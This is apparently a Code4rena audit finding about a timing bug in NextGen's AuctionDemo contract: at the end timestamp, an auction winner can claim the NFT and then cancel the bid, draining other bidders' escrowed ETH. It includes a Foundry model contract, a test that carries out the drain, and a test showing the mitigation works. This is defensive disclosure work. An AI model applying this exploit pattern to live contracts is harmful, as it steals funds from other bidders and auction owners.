Auction winner can claim their NFT and cancel their bid #274
Labels
3 (High Risk)
Assets can be stolen/lost/compromised directly
bug
Something isn't working
duplicate-1323
satisfactory
satisfies C4 submission criteria; eligible for awards
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L124
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L134
Vulnerability details
Impact
In the AuctionDemo contract the winner of the auction can claim their NFT and then cancel their winning bid, which means they get the NFT for free.
This is done in the following steps, at the end of the auction (block.timestamp == minter.getAuctionEndTime(_tokenid)), the one timestamp at which both the claimAuction() check (block.timestamp >= end time) and the cancelBid()/cancelAllBids() check (block.timestamp <= end time) pass:
This attack does require the amount of ETH in the contract to be greater than or equal to the winning bid (before the attacker places the bid), since claimAuction() forwards the winning bid to the owner and the cancelled bid is then refunded out of whatever is left. This should easily be possible with other auctions happening.
It also has the effect of there not being enough ETH left for the other auctions, meaning that some of the bidders will not receive their refund and the owner may not receive the winning bid.
Proof of Concept
In this POC we assume there are other auctions happening and that the sum of their bids is greater than 1 ETH.
This ensures there is enough balance in the contract for the attacker to cancel their bid after claiming.
Tools Used
Foundry
Recommended Mitigation Steps
Update claimAuction() so that it can only be called after the end of the auction (block.timestamp > minter.getAuctionEndTime(_tokenid)) and not at the end (the current check uses >=).
This ensures that claimAuction() and cancelBid()/cancelAllBids() cannot both pass their timestamp checks in the same transaction.
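The following is an added Foundry example, not the warden's PoC and not the NextGen code. AuctionModel is a single-auction stand-in for AuctionDemo that keeps the audited boundary checks (>= in claim, <= in cancel) when deployed with vulnerable = true, and applies the mitigation (strict >, plus marking settled bids inactive as extra defence) when deployed with vulnerable = false. The 5 ether pre-funded into the contract stands in for the other auctions' escrowed bids; the NFT transfer is left out since the drain is the point. Contract names, the END constant and the actor addresses are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

// Simplified model of AuctionDemo (added example, not the project's code):
// one auction, bids escrowed in this contract, same timestamp checks.
contract AuctionModel {
    struct Bid { address bidder; uint256 bid; bool status; }

    Bid[] public bids;
    address public immutable owner;          // receives the winning bid
    uint256 public immutable auctionEndTime;
    bool public immutable vulnerable;        // true: original checks, false: mitigation
    bool public auctionClaim;

    constructor(address _owner, uint256 _end, bool _vulnerable) {
        owner = _owner; auctionEndTime = _end; vulnerable = _vulnerable;
    }

    receive() external payable {}            // lets the test pre-fund "other auctions" ETH

    function participate() external payable {
        require(block.timestamp <= auctionEndTime, "Auction ended");
        bids.push(Bid(msg.sender, msg.value, true));
    }

    function highestIndex() public view returns (uint256 idx) {
        uint256 best;
        for (uint256 i = 0; i < bids.length; i++) {
            if (bids[i].status && bids[i].bid > best) { best = bids[i].bid; idx = i; }
        }
    }

    function claimAuction() external {
        // Original: >= ; mitigation: strict >, so claim and cancel never both pass at end time.
        if (vulnerable) require(block.timestamp >= auctionEndTime, "not ended");
        else require(block.timestamp > auctionEndTime, "not ended");
        require(!auctionClaim, "claimed");
        auctionClaim = true;
        uint256 h = highestIndex();
        for (uint256 i = 0; i < bids.length; i++) {
            if (!bids[i].status) continue;
            address to = (i == h) ? owner : bids[i].bidder;   // winner's ETH to owner, rest refunded
            (bool ok, ) = payable(to).call{value: bids[i].bid}("");
            require(ok, "pay failed");
            if (!vulnerable) bids[i].status = false;          // settled bids cannot be cancelled
        }
    }

    function cancelBid(uint256 index) external {
        require(block.timestamp <= auctionEndTime, "Auction ended");   // same as the audited check
        require(bids[index].bidder == msg.sender && bids[index].status, "bad bid");
        bids[index].status = false;
        (bool ok, ) = payable(msg.sender).call{value: bids[index].bid}("");
        require(ok, "refund failed");
    }
}

contract AuctionTimingTest is Test {
    address owner = makeAddr("owner");
    address attacker = makeAddr("attacker");
    uint256 constant END = 1_000_000;        // assumed auction end timestamp

    function _setup(bool vulnerable) internal returns (AuctionModel a) {
        a = new AuctionModel(owner, END, vulnerable);
        vm.deal(address(a), 5 ether);        // stands in for other auctions' escrowed bids
        vm.deal(attacker, 1 ether);
        vm.prank(attacker);
        a.participate{value: 1 ether}();
    }

    function testWinnerReclaimsBidAtBoundary() public {
        AuctionModel a = _setup(true);
        vm.warp(END);                        // block.timestamp == auctionEndTime
        vm.startPrank(attacker);
        a.claimAuction();                    // owner is paid 1 ether
        a.cancelBid(0);                      // attacker's 1 ether comes back
        vm.stopPrank();
        assertEq(owner.balance, 1 ether);
        assertEq(attacker.balance, 1 ether); // net cost zero: 1 ether drained from the others
        assertEq(address(a).balance, 4 ether);
    }

    function testMitigationBlocksSameTimestampClaim() public {
        AuctionModel a = _setup(false);
        vm.warp(END);
        vm.prank(attacker);
        vm.expectRevert("not ended");
        a.claimAuction();
        vm.warp(END + 1);
        vm.prank(attacker);
        a.claimAuction();
        vm.prank(attacker);
        vm.expectRevert("Auction ended");    // cancel window is closed once claim is open
        a.cancelBid(0);
    }
}
```

Run with `forge test --match-contract AuctionTimingTest`. The first test passes only because the contract already held other ETH; with vm.deal(address(a), 0) the refund call in cancelBid() fails, which is the "not enough ETH for other auctions" effect described above, shifted onto whichever bidder or owner is paid last.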
Assessed type
Timing